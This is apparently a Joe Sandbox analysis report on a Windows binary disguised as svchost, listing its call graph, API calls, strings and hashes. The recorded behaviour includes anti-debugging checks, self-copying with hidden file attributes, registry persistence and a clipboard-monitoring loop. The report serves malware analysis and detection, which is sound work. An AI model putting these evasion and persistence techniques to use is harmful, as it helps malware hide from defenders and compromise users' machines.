__freea 66 API calls 10454->10457 10455->10454 10458 41126d 10455->10458 10456->10459 10457->10449 10460 411277 10458->10460 10463 4112a0 10458->10463 10459->10449 10459->10451 10460->10454 10461 41128b LCMapStringW 10460->10461 10461->10454 10462 4112ef LCMapStringW 10465 411305 WideCharToMultiByte 10462->10465 10466 411327 10462->10466 10464 410b93 _malloc 66 API calls 10463->10464 10467 4112bb __crtGetStringTypeA_stat 10463->10467 10464->10467 10465->10466 10468 40f127 __freea 66 API calls 10466->10468 10467->10454 10467->10462 10468->10454 10470->10408 10472 4136e9 EncodePointer 10471->10472 10472->10472 10473 413703 10472->10473 10473->9949 10475 401000 10474->10475 10476 401117 GetModuleHandleA 10475->10476 10477 40112a 10476->10477 10480 401163 10476->10480 10478 401134 GetProcAddress 10477->10478 10479 40114b GetCurrentProcess NtQueryInformationProcess 10478->10479 10478->10480 10479->10480 10480->9959 10480->9963 10480->9964 10579 401090 10481->10579 10484 40de84 SetErrorMode 10589 40d440 GetSystemTime 10484->10589 10485 40de55 _wcsrchr 10485->10484 10488 40de6f SetCurrentDirectoryW 10485->10488 10488->10484 10489 40e542 __ld12tod 5 API calls 10490 40de9e GetCommandLineW CommandLineToArgvW 10489->10490 10490->9967 10490->9968 10492 40f485 10491->10492 10493 40f4ee 10491->10493 10495 410b21 _raise 66 API calls 10492->10495 10496 40e007 10492->10496 10617 40f373 10493->10617 10497 40f491 10495->10497 10496->9976 10496->9977 10498 410acf _raise 11 API calls 10497->10498 10498->10496 10500 405b35 10499->10500 10526 405b2e 10499->10526 10501 405b5e GetPEB 10500->10501 10500->10526 10503 405b88 GetPEB 10501->10503 10501->10526 10502 40e542 __ld12tod 5 API calls 10504 405e0c 10502->10504 10505 405bb6 _memset 10503->10505 10503->10526 10504->9972 10506 405bd3 GetCurrentThread GetThreadContext 10505->10506 10507 405bf8 10506->10507 10508 401090 4 API calls 10507->10508 10507->10526 10509 405c3c 10508->10509 10632 40e120 10509->10632 10512 405c5a 10514 405c67 GetModuleHandleA 10512->10514 10515 405d28 10512->10515 10513 405c4f GetModuleHandleA 10513->10512 10516 405c81 LoadLibraryA 10514->10516 10517 405c92 GetProcAddress GetProcAddress 10514->10517 10520 405d41 OpenMutexA 10515->10520 10521 405d97 10515->10521 10515->10526 10516->10517 10518 405cc9 10517->10518 10519 405cde GetProcAddress GetProcAddress 10517->10519 10518->10519 10522 405cd2 10518->10522 10519->10515 10519->10522 10523 405d62 CloseHandle 10520->10523 10524 405d76 CreateMutexA 10520->10524 10528 405dd1 10521->10528 10638 4058a0 10521->10638 10522->10515 10523->10526 10524->10521 10524->10526 10525 405de5 CloseHandle 10525->10526 10526->10502 10528->10525 10528->10526 10530 40d81f _memset 10529->10530 10531 40d87e GetModuleFileNameW 10530->10531 10534 40d8a0 _wcsrchr 10531->10534 10567 40d899 10531->10567 10532 40e542 __ld12tod 5 API calls 10533 40de0e 10532->10533 10533->9972 10535 40f501 __NMSG_WRITE 66 API calls 10534->10535 10534->10567 10536 40d932 SHGetFolderPathW 10535->10536 10537 40d964 10536->10537 10538 40d94e 10536->10538 10692 40f5ce 10537->10692 10539 40f643 __NMSG_WRITE 66 API calls 10538->10539 10539->10537 10542 40f5ce __NMSG_WRITE 66 API calls 10543 40d998 CreateDirectoryW 10542->10543 10544 40d9c2 SetFileAttributesW 10543->10544 10545 40d9ae GetLastError 10543->10545 10546 40f5ce __NMSG_WRITE 66 API calls 10544->10546 10545->10544 10545->10567 10547 40d9e7 10546->10547 10548 40f5ce __NMSG_WRITE 66 API calls 10547->10548 10549 40da02 10548->10549 10550 40f5ce __NMSG_WRITE 66 API calls 10549->10550 10551 40da1b CopyFileW 10550->10551 10552 40da3f SetFileAttributesW 10551->10552 10551->10567 10553 40f5ce __NMSG_WRITE 66 API calls 10552->10553 10554 40da66 10553->10554 10555 40f5ce __NMSG_WRITE 66 API calls 10554->10555 10556 40da7f RegCreateKeyExW 10555->10556 10557 40db4b 10556->10557 10558 40dabd RegSetValueExW RegCloseKey 10556->10558 10559 40dc12 10557->10559 10560 40db5a RegCreateKeyExW 10557->10560 10558->10557 10569 40dc29 _wcsrchr 10559->10569 10701 40d6d0 10559->10701 10560->10559 10561 40db84 RegSetValueExW RegCloseKey 10560->10561 10561->10559 10565 40dd85 _memset 10566 40dd99 CreateProcessW 10565->10566 10566->10567 10568 40dde4 CloseHandle CloseHandle 10566->10568 10567->10532 10568->10567 10569->10565 10569->10567 10569->10569 10570 40dd60 CopyFileW SetFileAttributesW 10569->10570 10570->10565 10572 405e45 10571->10572 10573 405e4a GetPEB 10571->10573 10576 40e542 __ld12tod 5 API calls 10572->10576 10573->10572 10574 405e76 GetPEB 10573->10574 10574->10572 10575 405e9e _memset 10574->10575 10578 405ebb GetCurrentThread GetThreadContext 10575->10578 10577 405f41 10576->10577 10577->9972 10578->10572 10580 401000 10579->10580 10581 4010a0 GetModuleHandleA 10580->10581 10582 4010b3 10581->10582 10583 4010f8 GetModuleFileNameW 10581->10583 10584 4010bd GetProcAddress 10582->10584 10583->10484 10583->10485 10584->10583 10585 4010d4 10584->10585 10586 4010e2 GetCurrentThread 10585->10586 10587 4010da 10585->10587 10588 4010eb NtSetInformationThread 10586->10588 10587->10588 10588->10583 10594 40d140 10589->10594 10591 40d469 10592 40e542 __ld12tod 5 API calls 10591->10592 10593 40d484 10592->10593 10593->10489 10595 40d15f 10594->10595 10602 40d1f0 10595->10602 10597 40d176 10608 40d2f0 10597->10608 10600 40e542 __ld12tod 5 API calls 10601 40d196 10600->10601 10601->10591 10603 40d20c 10602->10603 10604 40d24c 10603->10604 10612 40cd20 10603->10612 10604->10597 10606 40d28d 10607 40cd20 5 API calls 10606->10607 10607->10604 10609 40d350 _memset 10608->10609 10610 40cd20 5 API calls 10609->10610 10611 40d189 10610->10611 10611->10600 10615 40cd4f 10612->10615 10613 40e542 __ld12tod 5 API calls 10614 40d12e 10613->10614 10614->10606 10615->10613 10616 40cf66 10615->10616 10616->10606 10618 40e551 _LocaleUpdate::_LocaleUpdate 76 API calls 10617->10618 10619 40f387 10618->10619 10620 40f3b4 10619->10620 10621 40f38e 10619->10621 10622 40f3bc 10620->10622 10630 40f3e3 10620->10630 10623 410b21 _raise 66 API calls 10621->10623 10624 410b21 _raise 66 API calls 10622->10624 10625 40f393 10623->10625 10626 40f3c1 10624->10626 10627 410acf _raise 11 API calls 10625->10627 10629 410acf _raise 11 API calls 10626->10629 10628 40f39e 10627->10628 10628->10496 10629->10628 10630->10628 10631 410e08 78 API calls __towlower_l 10630->10631 10631->10630 10633 40e13b QueryPerformanceCounter GetTickCount 10632->10633 10634 40e12e 10632->10634 10665 40ef09 10633->10665 10634->10633 10635 405c46 10634->10635 10635->10512 10635->10513 10639 4058f2 10638->10639 10640 405914 10638->10640 10641 40e120 68 API calls 10639->10641 10668 40e210 10640->10668 10643 4058f9 10641->10643 10680 40e170 10643->10680 10645 405938 10645->10528 10647 405987 10652 4059c9 WaitForSingleObject 10647->10652 10654 40599a GetLastError 10647->10654 10648 405957 AddClipboardFormatListener 10650 405985 10648->10650 10651 405965 DestroyWindow 10648->10651 10650->10652 10651->10645 10656 4059e1 10652->10656 10654->10652 10658 4059a9 DestroyWindow 10654->10658 10655 405a4d 10657 405a6d DestroyWindow 10655->10657 10660 405a63 RemoveClipboardFormatListener 10655->10660 10656->10655 10659 405a01 PeekMessageA 10656->10659 10661 405a94 10657->10661 10662 405a87 ReleaseMutex 10657->10662 10658->10645 10663 405a19 TranslateMessage DispatchMessageA 10659->10663 10664 405a2f Sleep 10659->10664 10660->10657 10661->10645 10662->10661 10663->10659 10664->10655 10664->10656 10666 410540 __getptd 66 API calls 10665->10666 10667 40e157 10666->10667 10667->10635 10669 40592c 10668->10669 10670 40e24b 10668->10670 10669->10645 10669->10647 10669->10648 10670->10669 10671 40e262 GetModuleHandleW 10670->10671 10672 40e26d GetClassInfoA 10670->10672 10671->10672 10673 40e29b RegisterClassA 10672->10673 10675 40e295 10672->10675 10673->10675 10674 40e301 10676 40e315 10674->10676 10677 40e307 ShowWindow 10674->10677 10675->10674 10678 40e2cb CreateWindowExA 10675->10678 10676->10669 10679 40e31d UnregisterClassA 10676->10679 10677->10669 10678->10674 10679->10669 10689 40ef1b 10680->10689 10683 40ef1b _rand 66 API calls 10684 405903 10683->10684 10685 40e1b0 10684->10685 10686 40e1ba 10685->10686 10687 40e1be 10685->10687 10686->10640 10687->10686 10688 40ef1b _rand 66 API calls 10687->10688 10688->10687 10690 410540 __getptd 66 API calls 10689->10690 10691 40e17a 10690->10691 10691->10683 10695 40f5e3 10692->10695 10696 40f5dc 10692->10696 10693 410b21 _raise 66 API calls 10694 40f5e8 10693->10694 10697 410acf _raise 11 API calls 10694->10697 10695->10693 10696->10695 10699 40f618 10696->10699 10698 40d97d 10697->10698 10698->10542 10699->10698 10700 410b21 _raise 66 API calls 10699->10700 10700->10694 10705 40d727 _memset 10701->10705 10702 40e542 __ld12tod 5 API calls 10703 40d7eb 10702->10703 10703->10569 10704 40d765 SHGetFolderPathW 10704->10705 10705->10704 10707 40f5ce __NMSG_WRITE 66 API calls 10705->10707 10709 40d73a 10705->10709 10710 40e340 10705->10710 10719 40d490 10705->10719 10707->10705 10709->10702 10713 40e376 _memset _wcschr 10710->10713 10711 40e542 __ld12tod 5 API calls 10712 40e4a4 10711->10712 10712->10705 10714 40f643 __NMSG_WRITE 66 API calls 10713->10714 10715 40e462 CreateDirectoryW 10713->10715 10716 40f501 __NMSG_WRITE 66 API calls 10713->10716 10718 40e389 10713->10718 10714->10713 10715->10713 10717 40e475 GetLastError 10715->10717 10716->10713 10717->10713 10717->10718 10718->10711 10720 40d4e4 10719->10720 10725 40d4ea 10719->10725 10721 40d503 CoInitializeEx 10720->10721 10720->10725 10722 40d523 CoCreateInstance 10721->10722 10723 40d519 10721->10723 10726 40d653 CoUninitialize 10722->10726 10728 40d543 10722->10728 10723->10722 10723->10725 10724 40e542 __ld12tod 5 API calls 10727 40d6be 10724->10727 10725->10724 10726->10725 10727->10705 10728->10726 10729 40d58f GetFileAttributesW 10728->10729 10730 40d59e 10729->10730 10733 40d5b3 _wcsrchr 10729->10733 10731 40f643 __NMSG_WRITE 66 API calls 10730->10731 10731->10733 10732 40d645 10732->10726 10733->10732 10734 40d639 SetFileAttributesW 10733->10734 10734->10732

                                      Executed Functions

                                      Function 00405B10 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 183COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: AddClipboardFormatListener$ChangeClipboardChain$RemoveClipboardFormatListener$SetClipboardViewer$cC0inHj$user32.dll
                                      • API String ID: 0-2614838119
                                      • Opcode ID: 46e57fd81572760438a23d69b1a289466db8ea427554a731aa1a13a6ab7f929a
                                      • Instruction ID: e4e5dd0de9f09d90ee084e7cb90bd22076d3a6f0aa843fabeb84720459f47b48
                                      • Opcode Fuzzy Hash: 46e57fd81572760438a23d69b1a289466db8ea427554a731aa1a13a6ab7f929a
                                      • Instruction Fuzzy Hash: BF717D74A442589BEB209F20DC4DBEA7BB4EB14305F4484BBE44A762E1C77C8AC5DF19
                                      Function 004058A0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 152windowsynchronizationclipboardCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040E170: _rand.LIBCMT ref: 0040E175
                                        • Part of subcall function 0040E170: _rand.LIBCMT ref: 0040E17F
                                      • AddClipboardFormatListener.USER32(00000000), ref: 0040595B
                                      • DestroyWindow.USER32(00000000), ref: 00405969
                                      • GetLastError.KERNEL32 ref: 0040599F
                                      • DestroyWindow.USER32(00000000), ref: 004059AD
                                      • WaitForSingleObject.KERNEL32(000000F0,00000000,81C72413), ref: 004059D2
                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00405A0F
                                      • TranslateMessage.USER32(?), ref: 00405A1D
                                      • DispatchMessageA.USER32(?), ref: 00405A27
                                      • Sleep.KERNELBASE(00000014), ref: 00405A31
                                      • RemoveClipboardFormatListener.USER32(00000000), ref: 00405A67
                                      • DestroyWindow.USER32(00000000), ref: 00405A71
                                      • ReleaseMutex.KERNEL32(000000F0), ref: 00405A8E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: DestroyMessageWindow$ClipboardFormatListener_rand$DispatchErrorLastMutexObjectPeekReleaseRemoveSingleSleepTranslateWait
                                      • String ID: hlcmbvlqbap
                                      • API String ID: 2075554847-1307111509
                                      • Opcode ID: 95db36bbe4d0b48d7d5dd216a49a5c101fdf29f495020ae77c52d24253815567
                                      • Instruction ID: 4f33caf6bca9ddad8697e74e62c9060a71084bf4d8c7d1bdb57def999465fb8c
                                      • Opcode Fuzzy Hash: 95db36bbe4d0b48d7d5dd216a49a5c101fdf29f495020ae77c52d24253815567
                                      • Instruction Fuzzy Hash: 92515BB0A00604DBDB20DFA4DC88BAFBBB4FB54714F14463AE506A62E0D7799905CF29
                                      Function 0040DEB0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 158COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 92 40deb0-40def2 IsDebuggerPresent 93 40def4-40df05 92->93 94 40df0a-40df14 call 401100 92->94 95 40e108-40e119 93->95 98 40df16-40df27 94->98 99 40df2c-40df43 94->99 98->95 100 40dfb0-40dfda call 40de20 GetCommandLineW CommandLineToArgvW 99->100 101 40df45-40df61 GetPEB 99->101 106 40dfe2-40dfe7 call 40d7f0 100->106 107 40dfdc-40dfe0 100->107 102 40df63-40df74 101->102 103 40df79-40df92 101->103 102->95 103->95 112 40e0ab-40e0af 106->112 107->106 109 40dfec-40dff0 107->109 111 40dff6-40e00c call 40f476 109->111 109->112 117 40e04e-40e064 call 40f476 111->117 118 40e00e-40e019 111->118 114 40e0b1-40e0b5 LocalFree 112->114 115 40e0bb-40e0d3 112->115 114->115 115->95 125 40e0a6 call 40d7f0 117->125 126 40e066-40e071 117->126 119 40e01b-40e031 call 40f476 118->119 120 40e03c-40e044 call 405b10 118->120 119->120 132 40e033-40e039 119->132 128 40e049-40e04c 120->128 125->112 129 40e073-40e089 call 40f476 126->129 130 40e094-40e0a4 call 405e10 126->130 128->112 129->130 137 40e08b-40e091 129->137 130->112 132->120 137->130
                                      APIs
                                      • IsDebuggerPresent.KERNEL32(81C72413), ref: 0040DEEA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: DebuggerPresent
                                      • String ID: --check$--config$--run
                                      • API String ID: 1347740429-1715824448
                                      • Opcode ID: 4998038e9da7e4c649bf71f5e2e5df3312fbbd31ea5429612011932821bd840d
                                      • Instruction ID: a6e4f3225be8be52f133a3bd3a6e0bcae41296a009743188dca9600d065854ff
                                      • Opcode Fuzzy Hash: 4998038e9da7e4c649bf71f5e2e5df3312fbbd31ea5429612011932821bd840d
                                      • Instruction Fuzzy Hash: D4518871D04218DBDB24CFA6D844BEEBBB4BB08314F14862AE811B73C0D37D9905CBA9
                                      Function 00405670 Relevance: 12.1, APIs: 8, Instructions: 140timewindowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 138 405670-405696 139 4056c3-4056cd 138->139 140 405698-4056a2 138->140 143 4056f3-4056fa 139->143 144 4056cf-4056d9 139->144 141 4056e0-4056ee call 405390 140->141 142 4056a4-4056ab 140->142 151 405883-405890 call 40e542 141->151 145 4056b1-4056b8 142->145 146 40573a-40575f GetPEB 142->146 149 405733-405735 143->149 150 4056fc-405705 143->150 144->141 147 4056db 144->147 154 405830-405846 KillTimer 145->154 155 4056be 145->155 152 405761-405764 146->152 153 405769-40578a GetPEB 146->153 156 40586d-40587d DefWindowProcA 147->156 149->151 158 405711-405718 150->158 159 405707-40570f 150->159 152->151 163 405794-4057ca call 4123e0 GetCurrentThread GetThreadContext 153->163 164 40578c-40578f 153->164 161 405861-40586b PostQuitMessage 154->161 162 405848-40584f 154->162 155->156 156->151 158->149 160 40571a-40572d SendMessageA 158->160 159->149 160->149 161->151 162->161 166 405851-40585a 162->166 170 405807-405824 SetTimer call 405390 163->170 171 4057cc-4057d3 163->171 164->151 166->161 175 405829-40582e 170->175 173 405802-405805 171->173 174 4057d5-4057dc 171->174 173->151 174->173 176 4057de-4057e5 174->176 175->151 176->173 177 4057e7-4057ee 176->177 177->173 178 4057f0-4057f7 177->178 178->173 179 4057f9-405800 178->179 179->170 179->173
                                      APIs
                                      • KillTimer.USER32(?,57AE0D82), ref: 00405839
                                      • PostQuitMessage.USER32(00000000), ref: 00405863
                                      • DefWindowProcA.USER32(?,?,?,?), ref: 0040587D
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: KillMessagePostProcQuitTimerWindow
                                      • String ID:
                                      • API String ID: 2965130154-0
                                      • Opcode ID: 5e9eba37a1ecaf64e48587de822f3b3fba0548cf68ae5b6666ec4dab3d8fb5eb
                                      • Instruction ID: 28f21435e46fd2e830124e72743dc58a12090b41100468ac95c48544234bd2ff
                                      • Opcode Fuzzy Hash: 5e9eba37a1ecaf64e48587de822f3b3fba0548cf68ae5b6666ec4dab3d8fb5eb
                                      • Instruction Fuzzy Hash: 58518435A00548DFDB24EF60DC48B9B77B4FB04354F4486BAE80AA62D0C7789A95CF59
                                      Function 00401100 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40librarynativeloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 180 401100-401128 call 401000 GetModuleHandleA 183 40112a-401149 call 401000 GetProcAddress 180->183 184 40116d 180->184 183->184 188 40114b-401161 GetCurrentProcess NtQueryInformationProcess 183->188 186 40116f-401172 184->186 188->184 189 401163-401167 188->189 189->184 190 401169-40116b 189->190 190->186
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 0040111B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040113C
                                      • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 00401155
                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 0040115C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Process$AddressCurrentHandleInformationModuleProcQuery
                                      • String ID: 7=-55V-55$v=y>.;Bq7/8;6*=287x;8,.<<
                                      • API String ID: 2292878059-3301033669
                                      • Opcode ID: 1c86e47dd1fd906bbdcf03037e39a74239d4cfa1ab3ab8fc813cf9e7548c363e
                                      • Instruction ID: a6687a9151404b893926094712e7bd645b6c75322a1efd05145472f72e85e0e4
                                      • Opcode Fuzzy Hash: 1c86e47dd1fd906bbdcf03037e39a74239d4cfa1ab3ab8fc813cf9e7548c363e
                                      • Instruction Fuzzy Hash: 6101ADB0E40208BBDF10AFF0AC0DBDE7B789B08709F104176E611B62E1D2795A44DB2A
                                      Function 00401180 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40librarynativeloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 191 401180-4011a8 call 401000 GetModuleHandleA 194 4011aa-4011c9 call 401000 GetProcAddress 191->194 195 4011ed 191->195 194->195 199 4011cb-4011e1 GetCurrentProcess NtQueryInformationProcess 194->199 196 4011ef-4011f2 195->196 199->195 200 4011e3-4011e7 199->200 200->195 201 4011e9-4011eb 200->201 201->196
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 0040119B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004011BC
                                      • GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 004011D5
                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 004011DC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Process$AddressCurrentHandleInformationModuleProcQuery
                                      • String ID: 7=-55V-55$v=y>.;Bq7/8;6*=287x;8,.<<
                                      • API String ID: 2292878059-3301033669
                                      • Opcode ID: 1075c5336364abca5659f37d9a9cc68f408a79e6500bfff9146bd29ceb1b4dad
                                      • Instruction ID: f3a3b2490c05c86b39bee9860363372222596c46706d0865df52a15b71608fee
                                      • Opcode Fuzzy Hash: 1075c5336364abca5659f37d9a9cc68f408a79e6500bfff9146bd29ceb1b4dad
                                      • Instruction Fuzzy Hash: E00186B0D40208BBDF149FE0DC4DBDD7BB89B08349F104076E601B62E1D6785754DB5A
                                      Function 00401200 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40librarynativeloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 202 401200-401228 call 401000 GetModuleHandleA 205 40122a-401249 call 401000 GetProcAddress 202->205 206 40126d 202->206 205->206 210 40124b-401261 GetCurrentProcess NtQueryInformationProcess 205->210 207 40126f-401272 206->207 210->206 211 401263-401267 210->211 211->206 212 401269-40126b 211->212 212->207
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 0040121B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040123C
                                      • GetCurrentProcess.KERNEL32(0000001F,00000000,00000004,00000000), ref: 00401255
                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 0040125C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Process$AddressCurrentHandleInformationModuleProcQuery
                                      • String ID: 7=-55V-55$v=y>.;Bq7/8;6*=287x;8,.<<
                                      • API String ID: 2292878059-3301033669
                                      • Opcode ID: 938599bffe4c1af892667c408258da0dbef6e56edbcb903562bc19fef294f7be
                                      • Instruction ID: 283a584ac4493401d37b65e144df0ac759d1c493dcd86ba3b9ae389d4cc3117d
                                      • Opcode Fuzzy Hash: 938599bffe4c1af892667c408258da0dbef6e56edbcb903562bc19fef294f7be
                                      • Instruction Fuzzy Hash: 440181B0E4420CBBDF10AFF09C0DBDE7B789B04709F1040BAE501B22E1D6785644DB6A
                                      Function 00401090 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 37threadlibrarynativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 213 401090-4010b1 call 401000 GetModuleHandleA 216 4010b3-4010d2 call 401000 GetProcAddress 213->216 217 4010f8-4010fb 213->217 216->217 220 4010d4-4010d8 216->220 221 4010e2-4010e8 GetCurrentThread 220->221 222 4010da-4010e0 220->222 223 4010eb-4010f5 NtSetInformationThread 221->223 222->223 223->217
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 004010A4
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004010C5
                                      • GetCurrentThread.KERNEL32 ref: 004010E2
                                      • NtSetInformationThread.NTDLL(?,00000011,00000000,00000000), ref: 004010F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Thread$AddressCurrentHandleInformationModuleProc
                                      • String ID: 7=-55V-55$v={.=q7/8;6*=287|1;.*-
                                      • API String ID: 119525482-1927140540
                                      • Opcode ID: 2435a75c996f34b6889767234aba8995ae01aaa7964b36a464df7492c5cc838d
                                      • Instruction ID: 0b82ffc8d0ca1f8d0bdf6dd75ae4657ab6c6ae2d9d09e3d18241b6bc1c87c415
